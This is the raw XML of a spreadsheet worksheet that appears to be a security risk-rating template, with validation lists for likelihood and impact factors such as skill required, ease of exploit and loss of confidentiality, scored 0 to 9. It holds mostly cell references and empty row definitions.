      <formula>NOT(ISERROR(SEARCH("high",D20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="3" operator="containsText" text="moderate">
      <formula>NOT(ISERROR(SEARCH("moderate",D20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="4" operator="containsText" text="low">
      <formula>NOT(ISERROR(SEARCH("low",D20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="0" priority="5" operator="containsText" text="Note">
      <formula>NOT(ISERROR(SEARCH("Note",D20)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="16">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G14" xr:uid="{7A680235-9B15-DB42-9992-E03A2EE40F84}">
      <formula1>PolicyViolation</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G13" xr:uid="{518DA7F8-0078-824E-A94D-47750AE7811B}">
      <formula1>NonCompliance</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G12" xr:uid="{3A370A40-68D5-AB40-AAA6-77E18D19C903}">
      <formula1>ReputationDamage</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G11" xr:uid="{6E8FAAF7-7337-074D-9598-4C3222AB32EB}">
      <formula1>FinancialDamage</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B14:D14" xr:uid="{37430CAC-5DF6-B347-B2A9-E37B6F23A9F3}">
      <formula1>IntrusionDetection</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B13:D13" xr:uid="{B28DC410-03B0-014B-B2CD-FF07132BB87D}">
      <formula1>Awareness</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B12:D12" xr:uid="{87525224-EB30-D745-B3DB-0EA1AB81B1E1}">
      <formula1>EaseofExploit</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B11:D11" xr:uid="{8EF2AC8E-8432-EA4F-8ABD-7FA0BF41EC11}">
      <formula1>EasyofDiscovery</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G8:G9" xr:uid="{063D8A2B-F967-B646-8E4F-57253C14AE87}">
      <formula1>LossofAccountability</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G7" xr:uid="{36D7EDAC-12CE-A04F-819D-722F1B51C236}">
      <formula1>LossofAvailability</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G6" xr:uid="{2556B8B3-77D7-0F4D-B4E9-716A9E43FB12}">
      <formula1>LossofIntegrity</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G5" xr:uid="{ADD78D3C-EC4B-D743-951A-71F58FA85B0F}">
      <formula1>LossofConfidentiality</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B8:D9" xr:uid="{31B30AD5-5F1D-3649-809D-2A91D26B163D}">
      <formula1>PopulationSize</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B7:D7" xr:uid="{45385128-2896-FC4F-8362-BD90D5F90457}">
      <formula1>Opportunity</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B6:D6" xr:uid="{F4DC81C5-CD54-C84E-8928-BC9305989031}">
      <formula1>Motive</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5" xr:uid="{14C898C0-27B6-0440-87FA-FC5542FCCB2B}">
      <formula1>SkillRequired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BAA5D-9C34-4849-8F26-F4594B1EBF09}">
  <dimension ref="A1:P1000"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A6" sqref="A6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="12.7109375" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="39" style="44" customWidth="1"/>
    <col min="2" max="2" width="2" style="44" customWidth="1"/>
    <col min="3" max="3" width="32.7109375" style="44" customWidth="1"/>
    <col min="4" max="4" width="2" style="44" customWidth="1"/>
    <col min="5" max="5" width="43.140625" style="44" customWidth="1"/>
    <col min="6" max="6" width="2" style="44" customWidth="1"/>
    <col min="7" max="7" width="38.28515625" style="44" customWidth="1"/>
    <col min="8" max="8" width="2" style="44" customWidth="1"/>
    <col min="9" max="9" width="38.28515625" style="44" customWidth="1"/>
    <col min="10" max="10" width="2" style="44" customWidth="1"/>
    <col min="11" max="11" width="27.7109375" style="44" customWidth="1"/>
    <col min="12" max="12" width="2" style="44" customWidth="1"/>
    <col min="13" max="13" width="23" style="44" customWidth="1"/>
    <col min="14" max="14" width="2" style="44" customWidth="1"/>
    <col min="15" max="15" width="31.28515625" style="44" customWidth="1"/>
    <col min="16" max="16" width="2" style="44" customWidth="1"/>
    <col min="17" max="16384" width="12.7109375" style="44"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" ht="23.25" customHeight="1">
      <c r="A1" s="48" t="s">
        <v>671</v>
      </c>
      <c r="B1" s="47"/>
      <c r="C1" s="48" t="s">
        <v>675</v>
      </c>
      <c r="D1" s="47"/>
      <c r="E1" s="48" t="s">
        <v>679</v>
      </c>
      <c r="F1" s="47"/>
      <c r="G1" s="48" t="s">
        <v>683</v>
      </c>
      <c r="H1" s="47"/>
      <c r="I1" s="48" t="s">
        <v>689</v>
      </c>
      <c r="J1" s="47"/>
      <c r="K1" s="48" t="s">
        <v>693</v>
      </c>
      <c r="L1" s="47"/>
      <c r="M1" s="48" t="s">
        <v>696</v>
      </c>
      <c r="N1" s="47"/>
      <c r="O1" s="48" t="s">
        <v>700</v>
      </c>
      <c r="P1" s="47"/>
    </row>
    <row r="2" spans="1:16" ht="12.75" customHeight="1">
      <c r="A2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="B2" s="47" t="s">
        <v>708</v>
      </c>
      <c r="C2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="D2" s="47" t="s">
        <v>708</v>
      </c>
      <c r="E2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="F2" s="47" t="s">
        <v>708</v>
      </c>
      <c r="G2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="H2" s="47" t="s">
        <v>708</v>
      </c>
      <c r="I2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="J2" s="47" t="s">
        <v>708</v>
      </c>
      <c r="K2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="L2" s="47" t="s">
        <v>708</v>
      </c>
      <c r="M2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="N2" s="47" t="s">
        <v>708</v>
      </c>
      <c r="O2" s="47" t="s">
        <v>707</v>
      </c>
      <c r="P2" s="47" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="3" spans="1:16" ht="12.75" customHeight="1">
      <c r="A3" s="47" t="s">
        <v>699</v>
      </c>
      <c r="B3" s="47">
        <v>0</v>
      </c>
      <c r="C3" s="47" t="s">
        <v>699</v>
      </c>
      <c r="D3" s="47">
        <v>0</v>
      </c>
      <c r="E3" s="47" t="s">
        <v>709</v>
      </c>
      <c r="F3" s="47">
        <v>0</v>
      </c>
      <c r="G3" s="47" t="s">
        <v>699</v>
      </c>
      <c r="H3" s="47">
        <v>0</v>
      </c>
      <c r="I3" s="47" t="s">
        <v>699</v>
      </c>
      <c r="J3" s="47">
        <v>0</v>
      </c>
      <c r="K3" s="47" t="s">
        <v>699</v>
      </c>
      <c r="L3" s="47">
        <v>0</v>
      </c>
      <c r="M3" s="47" t="s">
        <v>699</v>
      </c>
      <c r="N3" s="47">
        <v>0</v>
      </c>
      <c r="O3" s="47" t="s">
        <v>699</v>
      </c>
      <c r="P3" s="47">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:16" ht="12.75" customHeight="1">
      <c r="A4" s="47" t="s">
        <v>710</v>
      </c>
      <c r="B4" s="47">
        <v>1</v>
      </c>
      <c r="C4" s="47" t="s">
        <v>711</v>
      </c>
      <c r="D4" s="47">
        <v>1</v>
      </c>
      <c r="E4" s="47" t="s">
        <v>680</v>
      </c>
      <c r="F4" s="47">
        <v>4</v>
      </c>
      <c r="G4" s="47" t="s">
        <v>712</v>
      </c>
      <c r="H4" s="47">
        <v>2</v>
      </c>
      <c r="I4" s="47" t="s">
        <v>713</v>
      </c>
      <c r="J4" s="47">
        <v>1</v>
      </c>
      <c r="K4" s="47" t="s">
        <v>714</v>
      </c>
      <c r="L4" s="47">
        <v>1</v>
      </c>
      <c r="M4" s="47" t="s">
        <v>715</v>
      </c>
      <c r="N4" s="47">
        <v>1</v>
      </c>
      <c r="O4" s="47" t="s">
        <v>716</v>
      </c>
      <c r="P4" s="47">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:16" ht="12.75" customHeight="1">
      <c r="A5" s="47" t="s">
        <v>672</v>
      </c>
      <c r="B5" s="47">
        <v>3</v>
      </c>
      <c r="C5" s="47" t="s">
        <v>676</v>
      </c>
      <c r="D5" s="47">
        <v>4</v>
      </c>
      <c r="E5" s="47" t="s">
        <v>717</v>
      </c>
      <c r="F5" s="47">
        <v>7</v>
      </c>
      <c r="G5" s="47" t="s">
        <v>718</v>
      </c>
      <c r="H5" s="47">
        <v>4</v>
      </c>
      <c r="I5" s="47" t="s">
        <v>719</v>
      </c>
      <c r="J5" s="47">
        <v>3</v>
      </c>
      <c r="K5" s="47" t="s">
        <v>719</v>
      </c>
      <c r="L5" s="47">
        <v>3</v>
      </c>
      <c r="M5" s="47" t="s">
        <v>697</v>
      </c>
      <c r="N5" s="47">
        <v>4</v>
      </c>
      <c r="O5" s="47" t="s">
        <v>720</v>
      </c>
      <c r="P5" s="47">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:16" ht="12.75" customHeight="1">
      <c r="A6" s="47" t="s">
        <v>721</v>
      </c>
      <c r="B6" s="47">
        <v>5</v>
      </c>
      <c r="C6" s="47" t="s">
        <v>722</v>
      </c>
      <c r="D6" s="47">
        <v>9</v>
      </c>
      <c r="E6" s="47" t="s">
        <v>723</v>
      </c>
      <c r="F6" s="47">
        <v>9</v>
      </c>
      <c r="G6" s="47" t="s">
        <v>684</v>
      </c>
      <c r="H6" s="47">
        <v>5</v>
      </c>
      <c r="I6" s="47" t="s">
        <v>724</v>
      </c>
      <c r="J6" s="47">
        <v>7</v>
      </c>
      <c r="K6" s="47" t="s">
        <v>725</v>
      </c>
      <c r="L6" s="47">
        <v>5</v>
      </c>
      <c r="M6" s="47" t="s">
        <v>726</v>
      </c>
      <c r="N6" s="47">
        <v>6</v>
      </c>
      <c r="O6" s="47" t="s">
        <v>701</v>
      </c>
      <c r="P6" s="47">
        <v>8</v>
      </c>
    </row>
    <row r="7" spans="1:16" ht="12.75" customHeight="1">
      <c r="A7" s="47" t="s">
        <v>727</v>
      </c>
      <c r="B7" s="47">
        <v>6</v>
      </c>
      <c r="C7" s="47"/>
      <c r="D7" s="47"/>
      <c r="E7" s="47"/>
      <c r="F7" s="47"/>
      <c r="G7" s="47" t="s">
        <v>728</v>
      </c>
      <c r="H7" s="47">
        <v>6</v>
      </c>
      <c r="I7" s="47" t="s">
        <v>690</v>
      </c>
      <c r="J7" s="47">
        <v>9</v>
      </c>
      <c r="K7" s="47" t="s">
        <v>690</v>
      </c>
      <c r="L7" s="47">
        <v>9</v>
      </c>
      <c r="M7" s="47" t="s">
        <v>729</v>
      </c>
      <c r="N7" s="47">
        <v>9</v>
      </c>
      <c r="O7" s="47" t="s">
        <v>730</v>
      </c>
      <c r="P7" s="47">
        <v>9</v>
      </c>
    </row>
    <row r="8" spans="1:16" ht="12.75" customHeight="1">
      <c r="A8" s="47" t="s">
        <v>731</v>
      </c>
      <c r="B8" s="47">
        <v>9</v>
      </c>
      <c r="C8" s="47"/>
      <c r="D8" s="47"/>
      <c r="E8" s="47"/>
      <c r="F8" s="47"/>
      <c r="G8" s="47" t="s">
        <v>732</v>
      </c>
      <c r="H8" s="47">
        <v>9</v>
      </c>
      <c r="I8" s="47"/>
      <c r="J8" s="47"/>
      <c r="K8" s="47"/>
      <c r="L8" s="47"/>
      <c r="M8" s="47"/>
      <c r="N8" s="47"/>
      <c r="O8" s="47"/>
      <c r="P8" s="47"/>
    </row>
    <row r="9" spans="1:16" ht="12.75" customHeight="1"/>
    <row r="10" spans="1:16" ht="26.25" customHeight="1">
      <c r="A10" s="48" t="s">
        <v>673</v>
      </c>
      <c r="B10" s="48"/>
      <c r="C10" s="48" t="s">
        <v>677</v>
      </c>
      <c r="D10" s="48"/>
      <c r="E10" s="48" t="s">
        <v>681</v>
      </c>
      <c r="F10" s="48"/>
      <c r="G10" s="48" t="s">
        <v>685</v>
      </c>
      <c r="H10" s="48"/>
      <c r="I10" s="48" t="s">
        <v>691</v>
      </c>
      <c r="J10" s="48"/>
      <c r="K10" s="48" t="s">
        <v>694</v>
      </c>
      <c r="L10" s="48"/>
      <c r="M10" s="48" t="s">
        <v>698</v>
      </c>
      <c r="N10" s="48"/>
      <c r="O10" s="48" t="s">
        <v>702</v>
      </c>
      <c r="P10" s="45"/>
    </row>
    <row r="11" spans="1:16" ht="12.75" customHeight="1">
      <c r="A11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="B11" s="47" t="s">
        <v>708</v>
      </c>
      <c r="C11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="D11" s="47" t="s">
        <v>708</v>
      </c>
      <c r="E11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="F11" s="47" t="s">
        <v>708</v>
      </c>
      <c r="G11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="H11" s="47" t="s">
        <v>708</v>
      </c>
      <c r="I11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="J11" s="47" t="s">
        <v>708</v>
      </c>
      <c r="K11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="L11" s="47" t="s">
        <v>708</v>
      </c>
      <c r="M11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="N11" s="47" t="s">
        <v>708</v>
      </c>
      <c r="O11" s="47" t="s">
        <v>707</v>
      </c>
      <c r="P11" s="47" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="12" spans="1:16" ht="12.75" customHeight="1">
      <c r="A12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="B12" s="47">
        <v>0</v>
      </c>
      <c r="C12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="D12" s="47">
        <v>0</v>
      </c>
      <c r="E12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="F12" s="47">
        <v>0</v>
      </c>
      <c r="G12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="H12" s="47">
        <v>0</v>
      </c>
      <c r="I12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="J12" s="47">
        <v>0</v>
      </c>
      <c r="K12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="L12" s="47">
        <v>0</v>
      </c>
      <c r="M12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="N12" s="47">
        <v>0</v>
      </c>
      <c r="O12" s="47" t="s">
        <v>699</v>
      </c>
      <c r="P12" s="47">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:16" ht="12.75" customHeight="1">
      <c r="A13" s="47" t="s">
        <v>733</v>
      </c>
      <c r="B13" s="47">
        <v>2</v>
      </c>
      <c r="C13" s="47" t="s">
        <v>678</v>
      </c>
      <c r="D13" s="47">
        <v>1</v>
      </c>
      <c r="E13" s="47" t="s">
        <v>682</v>
      </c>
      <c r="F13" s="47">
        <v>1</v>
      </c>
      <c r="G13" s="47" t="s">
        <v>686</v>
      </c>
      <c r="H13" s="47">
        <v>1</v>
      </c>
      <c r="I13" s="47" t="s">
        <v>734</v>
      </c>
      <c r="J13" s="47">
        <v>1</v>
      </c>
      <c r="K13" s="47" t="s">
        <v>735</v>
      </c>
      <c r="L13" s="47">
        <v>1</v>
      </c>
      <c r="M13" s="47" t="s">
        <v>736</v>
      </c>
      <c r="N13" s="47">
        <v>2</v>
      </c>
      <c r="O13" s="47" t="s">
        <v>703</v>
      </c>
      <c r="P13" s="46">
        <v>3</v>
      </c>
    </row>
    <row r="14" spans="1:16" ht="12.75" customHeight="1">
      <c r="A14" s="47" t="s">
        <v>674</v>
      </c>
      <c r="B14" s="47">
        <v>6</v>
      </c>
      <c r="C14" s="47" t="s">
        <v>737</v>
      </c>
      <c r="D14" s="47">
        <v>3</v>
      </c>
      <c r="E14" s="47" t="s">
        <v>738</v>
      </c>
      <c r="F14" s="47">
        <v>5</v>
      </c>
      <c r="G14" s="47" t="s">
        <v>739</v>
      </c>
      <c r="H14" s="47">
        <v>7</v>
      </c>
      <c r="I14" s="47" t="s">
        <v>692</v>
      </c>
      <c r="J14" s="47">
        <v>3</v>
      </c>
      <c r="K14" s="47" t="s">
        <v>695</v>
      </c>
      <c r="L14" s="47">
        <v>4</v>
      </c>
      <c r="M14" s="47" t="s">
        <v>740</v>
      </c>
      <c r="N14" s="47">
        <v>5</v>
      </c>
      <c r="O14" s="47" t="s">
        <v>741</v>
      </c>
      <c r="P14" s="46">
        <v>5</v>
      </c>
    </row>
    <row r="15" spans="1:16" ht="12.75" customHeight="1">
      <c r="A15" s="47" t="s">
        <v>742</v>
      </c>
      <c r="B15" s="47">
        <v>7</v>
      </c>
      <c r="C15" s="47" t="s">
        <v>743</v>
      </c>
      <c r="D15" s="47">
        <v>5</v>
      </c>
      <c r="E15" s="47" t="s">
        <v>744</v>
      </c>
      <c r="F15" s="47">
        <v>7</v>
      </c>
      <c r="G15" s="47" t="s">
        <v>745</v>
      </c>
      <c r="H15" s="47">
        <v>9</v>
      </c>
      <c r="I15" s="47" t="s">
        <v>746</v>
      </c>
      <c r="J15" s="47">
        <v>7</v>
      </c>
      <c r="K15" s="47" t="s">
        <v>747</v>
      </c>
      <c r="L15" s="47">
        <v>5</v>
      </c>
      <c r="M15" s="47" t="s">
        <v>748</v>
      </c>
      <c r="N15" s="47">
        <v>7</v>
      </c>
      <c r="O15" s="47" t="s">
        <v>749</v>
      </c>
      <c r="P15" s="46">
        <v>7</v>
      </c>
    </row>
    <row r="16" spans="1:16" ht="12.75" customHeight="1">
      <c r="A16" s="47" t="s">
        <v>750</v>
      </c>
      <c r="B16" s="47">
        <v>9</v>
      </c>
      <c r="C16" s="47" t="s">
        <v>751</v>
      </c>
      <c r="D16" s="47">
        <v>7</v>
      </c>
      <c r="E16" s="47" t="s">
        <v>752</v>
      </c>
      <c r="F16" s="47">
        <v>9</v>
      </c>
      <c r="G16" s="47"/>
      <c r="H16" s="47"/>
      <c r="I16" s="47" t="s">
        <v>753</v>
      </c>
      <c r="J16" s="47">
        <v>9</v>
      </c>
      <c r="K16" s="47" t="s">
        <v>754</v>
      </c>
      <c r="L16" s="47">
        <v>9</v>
      </c>
      <c r="M16" s="47"/>
      <c r="N16" s="47"/>
      <c r="O16" s="47" t="s">
        <v>755</v>
      </c>
      <c r="P16" s="46">
        <v>9</v>
      </c>
    </row>
    <row r="17" spans="1:15" ht="12.75" customHeight="1">
      <c r="A17" s="47"/>
      <c r="B17" s="47"/>
      <c r="C17" s="47" t="s">
        <v>756</v>
      </c>
      <c r="D17" s="47">
        <v>9</v>
      </c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</row>
    <row r="18" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="19" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="20" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="21" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="22" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="23" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="24" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="25" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="26" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="27" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="28" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="29" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="30" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="31" spans="1:15" ht="12.75" customHeight="1"/>
    <row r="32" spans="1:15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  <row r="286" ht="12.95" customHeight="1"/>
    <row r="287" ht="12.95" customHeight="1"/>
    <row r="288" ht="12.95" customHeight="1"/>
    <row r="289" ht="12.95" customHeight="1"/>
    <row r="290" ht="12.95" customHeight="1"/>
    <row r="291" ht="12.95" customHeight="1"/>
    <row r="292" ht="12.95" customHeight="1"/>
    <row r="293" ht="12.95" customHeight="1"/>
    <row r="294" ht="12.95" customHeight="1"/>
    <row r="295" ht="12.95" customHeight="1"/>
    <row r="296" ht="12.95" customHeight="1"/>
    <row r="297" ht="12.95" customHeight="1"/>
    <row r="298" ht="12.95" customHeight="1"/>
    <row r="299" ht="12.95" customHeight="1"/>
    <row r="300" ht="12.95" customHeight="1"/>
    <row r="301" ht="12.95" customHeight="1"/>
    <row r="302" ht="12.95" customHeight="1"/>
    <row r="303" ht="12.95" customHeight="1"/>
    <row r="304" ht="12.95" customHeight="1"/>
    <row r="305" ht="12.95" customHeight="1"/>
    <row r="306" ht="12.95" customHeight="1"/>
    <row r="307" ht="12.95" customHeight="1"/>
    <row r="308" ht="12.95" customHeight="1"/>
    <row r="309" ht="12.95" customHeight="1"/>
    <row r="310" ht="12.95" customHeight="1"/>
    <row r="311" ht="12.95" customHeight="1"/>
    <row r="312" ht="12.95" customHeight="1"/>
    <row r="313" ht="12.95" customHeight="1"/>
    <row r="314" ht="12.95" customHeight="1"/>
    <row r="315" ht="12.95" customHeight="1"/>
    <row r="316" ht="12.95" customHeight="1"/>
    <row r="317" ht="12.95" customHeight="1"/>
    <row r="318" ht="12.95" customHeight="1"/>
    <row r="319" ht="12.95" customHeight="1"/>
    <row r="320" ht="12.95" customHeight="1"/>
    <row r="321" ht="12.95" customHeight="1"/>
    <row r="322" ht="12.95" customHeight="1"/>
    <row r="323" ht="12.95" customHeight="1"/>
    <row r="324" ht="12.95" customHeight="1"/>
    <row r="325" ht="12.95" customHeight="1"/>
    <row r="326" ht="12.95" customHeight="1"/>
    <row r="327" ht="12.95" customHeight="1"/>
    <row r="328" ht="12.95" customHeight="1"/>
    <row r="329" ht="12.95" customHeight="1"/>
    <row r="330" ht="12.95" customHeight="1"/>
    <row r="331" ht="12.95" customHeight="1"/>
    <row r="332" ht="12.95" customHeight="1"/>
    <row r="333" ht="12.95" customHeight="1"/>
    <row r="334" ht="12.95" customHeight="1"/>
    <row r="335" ht="12.95" customHeight="1"/>
    <row r="336" ht="12.95" customHeight="1"/>
    <row r="337" ht="12.95" customHeight="1"/>
    <row r="338" ht="12.95" customHeight="1"/>
    <row r="339" ht="12.95" customHeight="1"/>
    <row r="340" ht="12.95" customHeight="1"/>
    <row r="341" ht="12.95" customHeight="1"/>
    <row r="342" ht="12.95" customHeight="1"/>
    <row r="343" ht="12.95" customHeight="1"/>
    <row r="344" ht="12.95" customHeight="1"/>
    <row r="345" ht="12.95" customHeight="1"/>
    <row r="346" ht="12.95" customHeight="1"/>
    <row r="347" ht="12.95" customHeight="1"/>
    <row r="348" ht="12.95" customHeight="1"/>
    <row r="349" ht="12.95" customHeight="1"/>
    <row r="350" ht="12.95" customHeight="1"/>
    <row r="351" ht="12.95" customHeight="1"/>
    <row r="352" ht="12.95" customHeight="1"/>
    <row r="353" ht="12.95" customHeight="1"/>
    <row r="354" ht="12.95" customHeight="1"/>
    <row r="355" ht="12.95" customHeight="1"/>
    <row r="356" ht="12.95" customHeight="1"/>
    <row r="357" ht="12.95" customHeight="1"/>
    <row r="358" ht="12.95" customHeight="1"/>
    <row r="359" ht="12.95" customHeight="1"/>
    <row r="360" ht="12.95" customHeight="1"/>
    <row r="361" ht="12.95" customHeight="1"/>
    <row r="362" ht="12.95" customHeight="1"/>
    <row r="363" ht="12.95" customHeight="1"/>
    <row r="364" ht="12.95" customHeight="1"/>
    <row r="365" ht="12.95" customHeight="1"/>
    <row r="366" ht="12.95" customHeight="1"/>
    <row r="367" ht="12.95" customHeight="1"/>
    <row r="368" ht="12.95" customHeight="1"/>
    <row r="369" ht="12.95" customHeight="1"/>
    <row r="370" ht="12.95" customHeight="1"/>
    <row r="371" ht="12.95" customHeight="1"/>
    <row r="372" ht="12.95" customHeight="1"/>
    <row r="373" ht="12.95" customHeight="1"/>
    <row r="374" ht="12.95" customHeight="1"/>
    <row r="375" ht="12.95" customHeight="1"/>
    <row r="376" ht="12.95" customHeight="1"/>
    <row r="377" ht="12.95" customHeight="1"/>
    <row r="378" ht="12.95" customHeight="1"/>
    <row r="379" ht="12.95" customHeight="1"/>
    <row r="380" ht="12.95" customHeight="1"/>
    <row r="381" ht="12.95" customHeight="1"/>
    <row r="382" ht="12.95" customHeight="1"/>
    <row r="383" ht="12.95" customHeight="1"/>
    <row r="384" ht="12.95" customHeight="1"/>
    <row r="385" ht="12.95" customHeight="1"/>
    <row r="386" ht="12.95" customHeight="1"/>
    <row r="387" ht="12.95" customHeight="1"/>
    <row r="388" ht="12.95" customHeight="1"/>
    <row r="389" ht="12.95" customHeight="1"/>
    <row r="390" ht="12.95" customHeight="1"/>
    <row r="391" ht="12.95" customHeight="1"/>
    <row r="392" ht="12.95" customHeight="1"/>
    <row r="393" ht="12.95" customHeight="1"/>
    <row r="394" ht="12.95" customHeight="1"/>
    <row r="395" ht="12.95" customHeight="1"/>
    <row r="396" ht="12.95" customHeight="1"/>
    <row r="397" ht="12.95" customHeight="1"/>
    <row r="398" ht="12.95" customHeight="1"/>
    <row r="399" ht="12.95" customHeight="1"/>
    <row r="400" ht="12.95" customHeight="1"/>
    <row r="401" ht="12.95" customHeight="1"/>
    <row r="402" ht="12.95" customHeight="1"/>
    <row r="403" ht="12.95" customHeight="1"/>
    <row r="404" ht="12.95" customHeight="1"/>
    <row r="405" ht="12.95" customHeight="1"/>
    <row r="406" ht="12.95" customHeight="1"/>
    <row r="407" ht="12.95" customHeight="1"/>
    <row r="408" ht="12.95" customHeight="1"/>
    <row r="409" ht="12.95" customHeight="1"/>
    <row r="410" ht="12.95" customHeight="1"/>
    <row r="411" ht="12.95" customHeight="1"/>
    <row r="412" ht="12.95" customHeight="1"/>
    <row r="413" ht="12.95" customHeight="1"/>
    <row r="414" ht="12.95" customHeight="1"/>
    <row r="415" ht="12.95" customHeight="1"/>
    <row r="416" ht="12.95" customHeight="1"/>
    <row r="417" ht="12.95" customHeight="1"/>
    <row r="418" ht="12.95" customHeight="1"/>
    <row r="419" ht="12.95" customHeight="1"/>
    <row r="420" ht="12.95" customHeight="1"/>
    <row r="421" ht="12.95" customHeight="1"/>
    <row r="422" ht="12.95" customHeight="1"/>
    <row r="423" ht="12.95" customHeight="1"/>
    <row r="424" ht="12.95" customHeight="1"/>
    <row r="425" ht="12.95" customHeight="1"/>
    <row r="426" ht="12.95" customHeight="1"/>
    <row r="427" ht="12.95" customHeight="1"/>
    <row r="428" ht="12.95" customHeight="1"/>
    <row r="429" ht="12.95" customHeight="1"/>
    <row r="430" ht="12.95" customHeight="1"/>
    <row r="431" ht="12.95" customHeight="1"/>
    <row r="432" ht="12.95" customHeight="1"/>
    <row r="433" ht="12.95" customHeight="1"/>
    <row r="434" ht="12.95" customHeight="1"/>
    <row r="435" ht="12.95" customHeight="1"/>
    <row r="436" ht="12.95" customHeight="1"/>
    <row r="437" ht="12.95" customHeight="1"/>
    <row r="438" ht="12.95" customHeight="1"/>
    <row r="439" ht="12.95" customHeight="1"/>
    <row r="440" ht="12.95" customHeight="1"/>
    <row r="441" ht="12.95" customHeight="1"/>
    <row r="442" ht="12.95" customHeight="1"/>
    <row r="443" ht="12.95" customHeight="1"/>
    <row r="444" ht="12.95" customHeight="1"/>
    <row r="445" ht="12.95" customHeight="1"/>
    <row r="446" ht="12.95" customHeight="1"/>
    <row r="447" ht="12.95" customHeight="1"/>
    <row r="448" ht="12.95" customHeight="1"/>
    <row r="449" ht="12.95" customHeight="1"/>
    <row r="450" ht="12.95" customHeight="1"/>
    <row r="451" ht="12.95" customHeight="1"/>
    <row r="452" ht="12.95" customHeight="1"/>
    <row r="453" ht="12.95" customHeight="1"/>
    <row r="454" ht="12.95" customHeight="1"/>
    <row r="455" ht="12.95" customHeight="1"/>
    <row r="456" ht="12.95" customHeight="1"/>
    <row r="457" ht="12.95" customHeight="1"/>
    <row r="458" ht="12.95" customHeight="1"/>
    <row r="459" ht="12.95" customHeight="1"/>
    <row r="460" ht="12.95" customHeight="1"/>
    <row r="461" ht="12.95" customHeight="1"/>
    <row r="462" ht="12.95" customHeight="1"/>
    <row r="463" ht="12.95" customHeight="1"/>
    <row r="464" ht="12.95" customHeight="1"/>
    <row r="465" ht="12.95" customHeight="1"/>
    <row r="466" ht="12.95" customHeight="1"/>
    <row r="467" ht="12.95" customHeight="1"/>
    <row r="468" ht="12.95" customHeight="1"/>
    <row r="469" ht="12.95" customHeight="1"/>
    <row r="470" ht="12.95" customHeight="1"/>
    <row r="471" ht="12.95" customHeight="1"/>
    <row r="472" ht="12.95" customHeight="1"/>
    <row r="473" ht="12.95" customHeight="1"/>
    <row r="474" ht="12.95" customHeight="1"/>
    <row r="475" ht="12.95" customHeight="1"/>
    <row r="476" ht="12.95" customHeight="1"/>
